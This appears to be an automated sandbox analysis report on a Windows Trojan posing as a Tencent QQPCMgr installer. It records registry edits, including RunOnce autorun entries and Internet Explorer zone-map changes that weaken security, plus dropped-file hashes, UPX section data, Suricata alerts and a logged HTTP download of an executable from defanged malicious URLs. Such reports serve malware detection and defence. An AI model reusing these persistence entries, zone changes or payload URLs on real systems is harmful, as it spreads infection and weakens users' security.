"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"Identity" = "policy.8.0.Microsoft.VC80.CRT,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortManifestName" = "X86623~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Files\0]
"(Default)" = "ATL80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"Identity" = "Microsoft.VC80.ATL,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortName" = "AMD64_~1.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 45 79 5B 81 1F 57 7B F3 5A 89 87 B4 0E 0F 44"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"Identity" = "Microsoft.VC80.CRT,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\2]
"SHA1" = "A8 0D A7 44 A5 FA 77 C7 BE 3D 36 77 1B D6 23 FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"Identity" = "policy.8.0.Microsoft.VC80.ATL,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ManifestSHA1Hash" = "AB 71 CE B9 08 61 FC 0D C9 A5 3D D0 9F 12 BD BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\2]
"(Default)" = "msvcm80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\1]
"SHA1" = "67 8B F3 DA 5D 19 87 BB 88 FD 47 C4 80 1E CB 41"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ManifestSHA1Hash" = "97 D7 B2 46 C8 71 05 C6 5B B7 FD B4 9C 41 0C BB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ManifestSHA1Hash" = "A0 A0 FB D5 A5 56 F5 DE 3C C1 79 7D 55 CA 31 50"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ShortManifestName" = "805072~1.POL"
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\0]
"(Default)" = "msvcr80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortManifestName" = "805072~3.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\1]
"(Default)" = "msvcp80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Files\0]
"SHA1" = "99 84 0D CC 34 E7 8A F2 39 D8 08 41 EB A3 16 C1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortName" = "X86_MI~1.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"Identity" = "policy.8.0.Microsoft.VC80.ATL,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ShortCatalogName" = "X8EAA8~1.CAT"
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ManifestSHA1Hash" = "41 B9 78 58 8A 99 02 F5 E1 4B 2B 69 39 73 CB 21"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortCatalogName" = "AMD64_~2.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\0]
"SHA1" = "0A 38 B6 52 C9 D0 3C AA B8 03 C6 B2 50 5F A3 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"ManifestSHA1Hash" = "2B 1A 5F D2 D6 54 C7 B7 B5 B9 59 FE 43 60 EE 65"
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortCatalogName" = "805072~3.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\1]
"(Default)" = "msvcp80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"ShortName" = "805072~3.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\1]
"SHA1" = "45 39 9C 26 97 A5 B2 E7 DB 02 2A 0E 4B 71 19 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ManifestSHA1Hash" = "F3 12 F4 44 C1 E5 A5 25 D6 51 C2 71 C1 BA 7F 24"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortCatalogName" = "805072~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortManifestName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"ManifestSHA1Hash" = "12 C3 31 19 86 23 33 23 2F 8F D4 E4 F2 83 41 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortManifestName" = "AMD64_~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\Files\0]
"SHA1" = "6D 7C E3 7B 57 53 AA 3F 8B 6C 2C 81 70 01 1B 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortCatalogName" = "X8E97F~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"Identity" = "policy.8.0.Microsoft.VC80.CRT,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32-policy,version=8.0.50727.4053"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 578184" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\578184"

"WinSideBySideSetupCleanup 560109" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\560109"

"WinSideBySideSetupCleanup 581874" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\581874"

"WinSideBySideSetupCleanup 590281" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\590281"

"WinSideBySideSetupCleanup 584679" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\584679"

"WinSideBySideSetupCleanup 586830" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\586830"

"WinSideBySideSetupCleanup 572300" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\572300"

"WinSideBySideSetupCleanup 568451" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\568451"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinSideBySideSetupCleanup 584679"

"WinSideBySideSetupCleanup 560109"

"WinSideBySideSetupCleanup 572300"

"WinSideBySideSetupCleanup 586830"

"WinSideBySideSetupCleanup 590281"

"WinSideBySideSetupCleanup 568451"

"WinSideBySideSetupCleanup 581874"

"WinSideBySideSetupCleanup 578184"

The process qqpcmgr_v11.4.17339.217_90008_Silence.exe:296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 97 3D D6 46 7B 9F 22 A9 1B A0 FC 11 F8 C1 0A"

The process %original file name%.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\9a8e64b26e0ca1adb9069df4cb6d7c2f\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3]
"05a00036.exe" = "05a00036"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 F4 51 E6 6E 48 59 6A D2 40 89 41 57 25 80 88"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\9a8e64b26e0ca1adb9069df4cb6d7c2f\DEBUG]
"Trace Level"

The process cacls.exe:876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 75 CB 78 FD 8F 92 6F 84 E4 E1 C7 1B 4E 35 B0"

Dropped PE files

MD5 File path
d34fa9fba62bcc56f6691e4b3df0a774 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 4378624 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 4382720 1740800 1738240 5.46565 b6192a85c6f5bbabda8a2f9451762d5f
.rsrc 6123520 8192 8192 2.73417 9bb4da44dea5535d3f663f44c695358b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 127
927ce25fa2086dd9dbbb1f7b5a894747
00340a56e4bcbcbe5d0ae40a08d419a1
de994336663e217709efe3b2bbb11ab3
b8f7c856f5c2cbabf7f94516c27a5ebb
a38269a8ea9461be21291a17f5ade093
946044f0a68e52423a067a95481b60b1
eca5799a267b5f39d3212baf2ca99241
6734be1a9d319d3b08e5ed1d2acc04e5
7bbc83fb21d970a38db74da5ac0017fb
3333c20681a756c0a88e4549fd1c33a0
0a46bf46b6cd8645c155e51a0ee6a93c
6bdb055204daacd6891c2fe846aff49d
f62a9bd46b7beec465076e8d10bc01d4
af721822a1565132254c9e521136ffa1
38114986e42e103e802c2251a51a34fd
0ffd951e896f29895772f8d1316ed820
b948a46065bbc61d737d3cf9c086917d
5aad2e2b18003a5622bdc733b06cea76
9d7d53f325e478e3fc663e630a68c1e2
c978ea9ac9ee6d54606600d5457a79d6
70e3edc4a39c5fc5ec2f19bdd63defd6
db7bfd9c64659ff18407fab1b158d286
774ffef5f68b4f0e2b304faa78458c9f
35b145ab1e929e1a9d70844c3cd1b0dd
6e69a579fecf58e1588f850be0bb65fe
ca634f6e84430cf9d7e90800dbfe7642

URLs

URL IP
hxxp://diun.intences.ru/api
hxxp://cipday.dutfetuda.biz/installs/573/6238b9e5.exe
hxxp://union.baidu2019.com/qq/1.txt 191.96.112.9
hxxp://union.baidu2019.com/qq/qqpcmgr_v11.4.17339.217_90008_Silence.exe 191.96.112.9


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (Agent and 5 or 6 digits)
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /installs/573/6238b9e5.exe HTTP/1.1
Host: cipday.dutfetuda.biz
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.15


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Mar 2016 01:50:45 GMT
Content-Type: application/octet-stream
Content-Length: 3505152
Connection: keep-alive
Last-Modified: Fri, 25 Mar 2016 01:50:05 GMT
ETag: "56f4994d-357c00"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........t".h.q.h.q
.h.q...q.h.q...q.h.q...q.h.q...q.h.q.h.q.k.q...q*i.q...q.h.q...q.h.qRi
ch.h.q........................PE..L...X5.V.................R1..&......
